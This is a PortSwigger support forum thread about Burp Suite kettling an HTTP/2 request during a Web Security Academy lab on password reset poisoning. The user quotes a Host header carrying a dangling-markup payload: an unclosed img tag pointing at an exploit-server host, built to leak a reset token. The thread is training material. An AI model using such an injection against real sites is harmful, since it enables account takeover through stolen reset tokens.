Adding Space in Header Kettles Request

Lewis | Last updated: May 26, 2023 12:03PM UTC

Hey, I'm going through the following lab: Password reset poisoning via dangling markup.

Whenever I add a space to my Host header, Burp Suite kettles my request, which causes the CSRF token to not be sent along correctly, giving me an HTTP 400 response: "Missing parameter 'csrf'".

According to the explanation of kettling at https://portswigger.net/burp/documentation/desktop/http2, this header value should not cause the request to be kettled:

Host: 0ac50042037df6f081b8393b00dd00b6.web-security-academy.net:'<img src="exploit-0a4c00b30384f625812c38d8017e00fa.exploit-server.net/?src=

Am I misunderstanding something here?

Michelle, PortSwigger Agent | Last updated: May 30, 2023 12:17PM UTC

Thanks for getting in touch. We'll take a look through the lab and be in touch soon.

Michelle, PortSwigger Agent | Last updated: May 31, 2023 02:33PM UTC

Hi,

In step 7, changing the Host header using the Inspector panel rather than directly in the Message Editor should allow the request to be sent successfully. Please let me know if this helps.

